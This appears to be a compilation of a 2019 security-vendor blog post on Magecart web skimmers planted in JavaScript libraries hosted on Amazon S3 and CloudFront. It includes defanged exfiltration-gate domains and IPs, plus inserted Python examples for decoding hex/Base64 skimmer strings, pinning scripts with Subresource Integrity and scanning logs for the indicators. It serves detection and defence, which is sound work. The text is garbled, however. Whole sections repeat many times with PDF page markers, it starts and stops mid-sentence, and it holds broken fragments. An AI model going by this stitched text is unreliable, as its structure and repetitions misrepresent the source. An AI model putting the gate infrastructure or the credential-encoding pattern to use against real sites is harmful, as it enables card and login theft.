diffed against the previous copy and rolled back, and logging of object writes (CloudTrail data events in the AWS case) so that an unexpected upload is noticed. Other measures, such as validation of any externally loaded content via Subresource Integrity checks, can save the day: the integrity attribute pins a hash of the script in the page, and the browser refuses to execute a file whose hash no longer matches, which would have stopped the tampered libraries above from running. The trade-off is that the hash has to be regenerated whenever the library legitimately changes, so it belongs in the build and deploy step, and a script fetched cross-origin from S3 or CloudFront needs the crossorigin attribute on the tag and matching CORS headers from the bucket.\r\nWe reached out to the victims we identified in this campaign, and several have already remediated the breach. In other cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the skimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\n
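The two-layer encoding described under Exfiltration gate above is easy to undo once the layers are recognized. The following is an added example, not the skimmer's code or anything from the original post: it strips nested hex and Base64 layers from a string and recovers the gate and a stolen-form record. The encoded samples are constructed here (the real payload is not reproduced), the order in which the two layers were applied is an assumption, and so is the guess that the exfiltrated fields travel as JSON.

```python
"""Peel the nested hex / Base64 layers a skimmer uses to hide strings.

Added example, not the post's code: the skimmer's real payload is not
reproduced here, so the encoded samples below are constructed with the
same two layers the post describes (hex and Base64). The order in which
the layers were applied is an assumption; peel() does not rely on it.
"""
from __future__ import annotations

import base64
import binascii
import json
import re
import string

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable.encode())


def _as_text(raw: bytes) -> str | None:
    """Return raw as str only if every byte is printable ASCII."""
    if raw and all(b in PRINTABLE for b in raw):
        return raw.decode("ascii")
    return None


def peel(blob: str, max_layers: int = 8) -> tuple[str, list[str]]:
    """Decode hex or Base64 repeatedly until the result is no longer encoded.

    Returns (plaintext, layers) where layers lists the encodings removed,
    outermost first. The charset tests are heuristics: a short plaintext made
    only of Base64 characters (e.g. "abcd") would be decoded one step too far.
    """
    layers: list[str] = []
    cur = blob.strip()
    for _ in range(max_layers):
        decoded = None
        if HEX_RE.match(cur) and len(cur) % 2 == 0:
            decoded = _as_text(bytes.fromhex(cur))
            kind = "hex"
        if decoded is None and B64_RE.match(cur) and len(cur) % 4 == 0:
            try:
                decoded = _as_text(base64.b64decode(cur, validate=True))
                kind = "base64"
            except (binascii.Error, ValueError):
                decoded = None
        if decoded is None:
            break
        layers.append(kind)
        cur = decoded
    return cur, layers


def decode_exfil(body: str) -> dict:
    """Recover the stolen form fields from an encoded exfiltration body.

    Assumes the body is the encoded form of a JSON object, which is an
    assumption about the skimmer, not something the post states.
    """
    plain, _ = peel(body)
    return json.loads(plain)


# --- constructed samples (defanged gate taken from the post's IoC list) ------
GATE = "https://cdn-imgcloud[.]com/img"
GATE_HEX_THEN_B64 = base64.b64encode(GATE.encode().hex().encode()).decode()
GATE_B64_THEN_HEX = base64.b64encode(GATE.encode()).hex()

STOLEN = {"email": "victim@example.test", "password": "hunter2"}   # constructed
EXFIL_BODY = base64.b64encode(json.dumps(STOLEN).encode().hex().encode()).decode()

if __name__ == "__main__":
    print(peel(GATE_HEX_THEN_B64))   # ('https://cdn-imgcloud[.]com/img', ['base64', 'hex'])
    print(peel(GATE_B64_THEN_HEX))   # ('https://cdn-imgcloud[.]com/img', ['hex', 'base64'])
    print(decode_exfil(EXFIL_BODY))
```

The peeler stops as soon as a layer fails to decode or yields non-printable bytes, so a URL or a JSON object (both contain characters outside the hex and Base64 alphabets) is returned as-is; real samples that mix string concatenation or character-code arrays with these layers still need those pieces joined first.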
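The Finding and exploiting weaknesses section points at Subresource Integrity. As an added example that is not part of the post or of any affected site's code, this is what pinning a self-hosted library looks like, together with the offline re-check a crawler or CI job can run to catch exactly the tampering the post describes. The library bytes, the appended skimmer stand-in and the CloudFront hostname are constructed placeholders.

```python
"""Pin self-hosted scripts with Subresource Integrity and re-check them.

Added example, not code from the post or from any of the affected sites.
The library bytes and the appended skimmer stand-in are constructed; the
CloudFront hostname is a placeholder.
"""
import base64
import hashlib
import hmac

SRI_ALGOS = ("sha256", "sha384", "sha512")   # the only digests browsers accept for SRI


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Value for the integrity attribute: '<algo>-<standard Base64 of the digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"SRI does not support {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """Emit the tag at build time, from the exact bytes that were uploaded.

    crossorigin is mandatory for SRI on a cross-origin fetch (an S3 bucket or
    CloudFront distribution is cross-origin to the page), and the bucket must
    answer with CORS headers or the browser will not run the script at all.
    """
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def still_matches(served: bytes, integrity: str) -> bool:
    """Offline re-check for a crawler or CI job: do the bytes the CDN serves
    now still hash to what the page pins? The browser runs the same test and
    refuses to execute the script on a mismatch."""
    algo, _, _ = integrity.partition("-")
    if algo not in SRI_ALGOS:
        return False
    return hmac.compare_digest(sri_hash(served, algo), integrity)


# --- constructed samples ----------------------------------------------------
ORIGINAL_JS = b"window.app = { init: function () { console.log('app ready'); } };\n"
# Stand-in for an appended skimmer: only the "appended to the original code"
# property from the post matters here; real ones are obfuscated.
TAMPERED_JS = ORIGINAL_JS + b"(function () { /* skimmer stand-in */ })();\n"
SRC = "https://d111111abcdef8.cloudfront.net/js/app.js"   # placeholder hostname

if __name__ == "__main__":
    pinned = sri_hash(ORIGINAL_JS)
    print(script_tag(SRC, ORIGINAL_JS))
    print("original ok:", still_matches(ORIGINAL_JS, pinned))   # True
    print("tampered ok:", still_matches(TAMPERED_JS, pinned))   # False
```

Generate the tag from the same bytes you upload, in the deploy step: a hash computed from a stale local copy breaks the page just as surely as a skimmer does, because the browser treats both as a mismatch.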
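To put the IoC list to work, here is an added example (not the post's code) that loads the list exactly as published, refangs it, and scans a proxy log for the gate domains and their subdomains, the gate IPs and, as a weaker lead, anything else in the same /24, following the post's observation that further gates sit on adjacent addresses. The log lines are constructed, and every hostname in them other than the published indicators is a placeholder.

```python
"""Hunt a proxy/web log for the post's IoCs and their neighbourhood.

Added example, not the post's code. IOC_CSV is the post's list, defanged as
published; SAMPLE_LOG is constructed and its non-IoC hosts are placeholders.
"""
import ipaddress
from urllib.parse import urlparse

IOC_CSV = """\
ww1-filecloud[.]com,45.114.8[.]159
cdn-imgcloud[.]com,45.114.8[.]160
font-assets[.]com,45.114.8[.]161
wix-cloud[.]com,45.114.8[.]162
js-cloudhost[.]com,45.114.8[.]163
"""


def refang(indicator: str) -> str:
    return indicator.strip().replace("[.]", ".").replace("hxxp", "http")


def load_iocs(csv_text: str):
    """Return (domains, ips, subnets): the published indicators plus the /24 of
    each gate IP, because the post found further gates on adjacent addresses."""
    domains, ips = set(), set()
    for line in csv_text.splitlines():
        if not line.strip():
            continue
        domain, ip = (refang(part) for part in line.split(","))
        domains.add(domain.lower())
        ips.add(ipaddress.ip_address(ip))
    subnets = {ipaddress.ip_network(f"{ip}/24", strict=False) for ip in ips}
    return domains, ips, subnets


def match_line(line: str, domains, ips, subnets) -> list:
    """Reasons a log line matches: 'domain' (exact or subdomain), 'ip' (exact
    gate address) or 'subnet' (same /24 as a gate; a hunting lead, not a block rule)."""
    _ts, _client, _method, url, dest = line.split()
    host = (urlparse(url).hostname or "").lower()
    dest_ip = ipaddress.ip_address(dest)
    reasons = []
    if host in domains or any(host.endswith("." + d) for d in domains):
        reasons.append("domain")
    if dest_ip in ips:
        reasons.append("ip")
    elif any(dest_ip in net for net in subnets):
        reasons.append("subnet")
    return reasons


def scan(log_text: str, csv_text: str = IOC_CSV) -> list:
    """Return [(url, reasons)] for every line that hits an indicator."""
    domains, ips, subnets = load_iocs(csv_text)
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        reasons = match_line(line, domains, ips, subnets)
        if reasons:
            hits.append((line.split()[3], reasons))
    return hits


# Constructed log: timestamp, client, method, URL, destination IP (one request per line)
SAMPLE_LOG = """\
2019-06-01T10:00:01Z 10.0.0.5 GET https://shop.example.test/checkout 203.0.113.10
2019-06-01T10:00:02Z 10.0.0.5 GET https://d111111abcdef8.cloudfront.net/js/app.js 203.0.113.20
2019-06-01T10:00:03Z 10.0.0.5 POST https://cdn-imgcloud.com/img 45.114.8.160
2019-06-01T10:00:04Z 10.0.0.7 GET https://static.font-assets.com/font.js 45.114.8.161
2019-06-01T10:00:05Z 10.0.0.9 POST https://unlisted-gate.example.test/x 45.114.8.164
"""

if __name__ == "__main__":
    for url, reasons in scan(SAMPLE_LOG):
        print(f"{','.join(reasons):12} {url}")
```

Treat a subnet-only hit as a lead to pivot on (passive DNS, registration date, nameservers, as the post does for cdn-imgcloud[.]com), not as a verdict: a shared /24 at a hosting provider is weak evidence on its own.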
Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 298 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 299 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. 
By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 300 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. 
Update (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected. Our crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official NBA.com website.\r\n
The skimmer was inserted in this JavaScript library:\r\n
hxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\n
Interestingly, this same library had already been altered (loading content from com) some time earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the page can be found here.\r\n
—\r\n
Late last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network (CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\n
Although attacks that involve CDNs usually affect a large number of web properties at once via their supply chain, this isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or link to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\n
Without properly validating content loaded externally, these sites are exposing their users to various threats, including some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of a campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\n
The ideal place to conceal a skimmer\r\n
CDNs are widely used because they provide great benefits to website owners, including optimizing load times and cost, as well as helping with all sorts of data analytics.\r\n
The sites we identified during a crawl had nothing in common other than the fact that they were all using their own custom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN repository would be themselves.\r\n
This first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer can be seen appended to the original code and using obfuscation to conceal itself.\r\n
This second case shows the skimmer injected not just in one library, but in several contained within the same directory, once again part of an S3 bucket that is only used by this one website.\r\n
Finally, here’s another example where the skimmer was injected in various scripts loaded from a custom CloudFront URL.\r\n
Exfiltration gate\r\n
This skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the exfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the criminal infrastructure.\r\n
While we would have expected to see many Magento e-commerce shops, some of the victims included a news portal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content Management Systems (CMSes).\r\n
As such, many did not even have a payment form within their site. Most simply had a sign-up or login form instead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the CDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to valuable infrastructure from which they can steal input data.\r\n
Connection with existing campaign\r\n
The skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the same exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent supply-chain attacks.\r\n
RiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another (ww1-filecloud[.]com) in an effort to disrupt the criminals’ infrastructure.\r\n
A cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple of days after the RiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\n
Creation Date: 2019-05-16T07:12:30Z\r\n
Registrar: Shinjiru Technology Sdn Bhd\r\n
Name Server: NS1.CARBON2U.COM\r\n
Name Server: NS2.CARBON2U.COM\r\n
The domain resolves to the IP address 45.114.8[.]160, which belongs to ASN 55933 in Hong Kong. By exploring the same subnet, we can find other exfiltration gates that were also registered recently.\r\n
What we can also see from the above VirusTotal graph is that the two domains (font-assets[.]com and ww1-filecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (a server in Switzerland) came back into the hands of the criminals.\r\n
Historical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161. The same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\n
Finding and exploiting weaknesses\r\n
This type of attack on private CDN repositories is not new, but it reminds us that threat actors will look to exploit anything that is vulnerable to gain entry into systems. Sometimes, coming in through the front door might not be a viable option, so they will look for other ways.\r\n
While this example is not a third-party script supply-chain attack, it is served from third-party infrastructure. Beyond applying the same level of access control to your own CDN-hosted repositories as to your actual website, other measures—such as validation of any externally loaded content (via Subresource Integrity checks, for example)—can save the day.\r\n
We reached out to the victims we identified in this campaign and several have already remediated the breach. In other cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the skimmers mentioned in this blog and the new ones we discover each day.\r\n
Indicators of Compromise (IoCs)\r\n
ww1-filecloud[.]com,45.114.8[.]159\r\n
cdn-imgcloud[.]com,45.114.8[.]160\r\n
font-assets[.]com,45.114.8[.]161\r\n
wix-cloud[.]com,45.114.8[.]162\r\n
js-cloudhost[.]com,45.114.8[.]163\r\n
Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 327 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 328 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. 
Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 329 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. 
Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 330 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 331 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. 
A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. 
The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 332 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 333 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 334 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. 
Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 335 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. 
Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 336 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 337 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. 
This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 338 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. 
By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 339 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. 
Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 340 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 341 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on 